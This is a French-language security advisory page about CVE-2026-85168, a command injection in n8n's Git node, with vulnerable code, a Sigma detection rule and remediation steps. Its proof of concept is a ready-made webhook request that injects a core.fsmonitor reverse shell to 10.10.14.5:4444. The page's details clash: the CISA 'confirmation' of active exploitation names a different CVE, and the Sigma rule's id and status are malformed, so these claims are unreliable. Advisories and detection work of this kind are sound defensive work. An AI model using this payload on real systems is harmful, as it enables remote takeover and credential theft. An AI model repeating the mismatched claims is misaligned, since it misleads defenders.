CVE-2026-85168 : injection de commandes OS via le nœud git dans N8N
SCORE DE MENACE HERMES & ÉVALUATION D'INFRASTRUCTURE AGENTIQUE
Cible :n8n Automation Platform (n8n-nodes-base.git (Git Node)) Le score CVSS v3.1 s'élève à 8.8 (Élevé) tandis que le score Hermes Threat Score est calculé à 89 (ÉLEVÉ). Étant donné que les nœuds n8n manipulent souvent des clés API de production et des accès cloud critiques, l'exécution de code au sein du conteneur n8n expose immédiatement l'ensemble des intégrations tierces.
CVE-2026-85168: Git Node Merge-Driver & Content-Filter Command Injection in n8nVULNÉRABILITÉ
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in n8n Workflow Automation documented in Hermes dossier.”
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Contexte technique & matrice d’impact
Section intitulée « 1. Contexte technique & matrice d’impact »| Paramètre | Spécification Technique | Contexte de Menace |
|---|---|---|
| Identifiant CVE | CVE-2026-85168 | Menaces IA Agentique & Protocole MCP |
| Produit ciblé | n8n Automation Platform | n8n GmbH |
| Composant affecté | n8n-nodes-base.git (Git Node) | Orchestrateur et couche d’outils agentiques |
| Nature de la faille | CWE-78: OS Command Injection | Violation d’intégrité et d’exécution |
| Versions vulnérables | prior to 1.123.73, 2.0.0 through 2.35.3, 2.36.0 through 2.36.1 | Environnements en production |
| Correctif disponible | 1.123.73, 2.35.4, 2.36.2 | Mise à jour impérative |
2. Analyse technique approfondie
Section intitulée « 2. Analyse technique approfondie »Décomposition technique de la vulnérabilité
Section intitulée « Décomposition technique de la vulnérabilité »Le nœud Git de n8n s’appuie sur la bibliothèque simple-git. Lors de l’évaluation des options complémentaires de clonage, la chaîne transmise était découpée de manière naïve sans vérification des clés de configuration Git :
// Code vulnérable dans packages/nodes-base/nodes/Git/Git.node.tsconst gitOptions: string[] = [];if (this.getNodeParameter('extraOptions', i, '')) { gitOptions.push(...(this.getNodeParameter('extraOptions', i) as string).split(' '));}await git.clone(repoUrl, targetPath, gitOptions);En fournissant un paramètre extraOptions contenant -c core.fsmonitor="bash -c '...'" ou un pilote de fusion personnalisé, Git invoque immédiatement l’exécutable spécifié lors de l’opération sur l’arborescence de travail.
+----------------------------------------------------------------------------------------------------+| CYCLE D'ATTAQUE CVE-2026-85168 |+----------------------------------------------------------------------------------------------------+
[Attaquant / Injection de Prompt] │ │ [1] Émission du payload ciblant l'interface d'outil ou l'orchestrateur ▼ [n8n Automation Platform] │ ├───► 1. Ingestion par n8n-nodes-base.git (Git Node) │ - Échec de validation, absence de filtrage ou contournement de sandbox │ ├───► 2. Exécution / Mutation d'état │ - Exécution de commandes OS ou exfiltration d'identifiants │ ▼ [Infrastructure Cible Compromise] │ └───► Vol de données, prise de contrôle du serveur ou persistance+----------------------------------------------------------------------------------------------------+3. Preuve de concept (PoC) & analyse du payload
Section intitulée « 3. Preuve de concept (PoC) & analyse du payload »# PoC : Déclenchement de l'injection de commandes via les options Git n8ncurl -X POST "https://n8n.internal.corp/webhook/git-sync" \ -H "Content-Type: application/json" \ -d '{ "repoUrl": "https://github.com/legit-org/docs.git", "branch": "main", "extraOptions": "-c core.fsmonitor=\"bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'\"" }'4. Ingénierie de détection & télémétrie
Section intitulée « 4. Ingénierie de détection & télémétrie »Règle de détection Sigma
Section intitulée « Règle de détection Sigma »title: n8n Git Node Arbitrary Command Executionid: 85168c02-e168-4a1b-9f23-n8ngitcmd01status: highdescription: Detects command execution spawned by n8n worker processes invoking git with custom fsmonitor, merge-driver or filter configurations.author: Hermes Codex Detection Engineeringdate: 2026-09-05logsource: category: process_creation product: linuxdetection: selection: ParentImage|endswith: - '/node' - '/n8n' Image|endswith: '/git' CommandLine|contains: - 'core.fsmonitor' - 'filter.' - 'merge.' - '-c ' condition: selectionfalsepositives: - Legitimate automated developer tooling with specialized filter configurations.level: critical5. Guide de remédiation & plan d’action
Section intitulée « 5. Guide de remédiation & plan d’action »- Appliquer les correctifs : mettre à jour
n8n Automation Platformvers la version1.123.73, 2.35.4, 2.36.2sans délai. - Restreindre les outils MCP : vérifier les déclarations d’outils et isoler les exécutions dans des conteneurs sandboxés éphémères.
- Auditer les journaux système : examiner les logs d’exécution pour repérer d’éventuels processus enfants anormaux ou appels réseau suspects.
- Appliquer le moindre privilège : restreindre les comptes de service associés aux agents sur les bases de données et les clés cloud.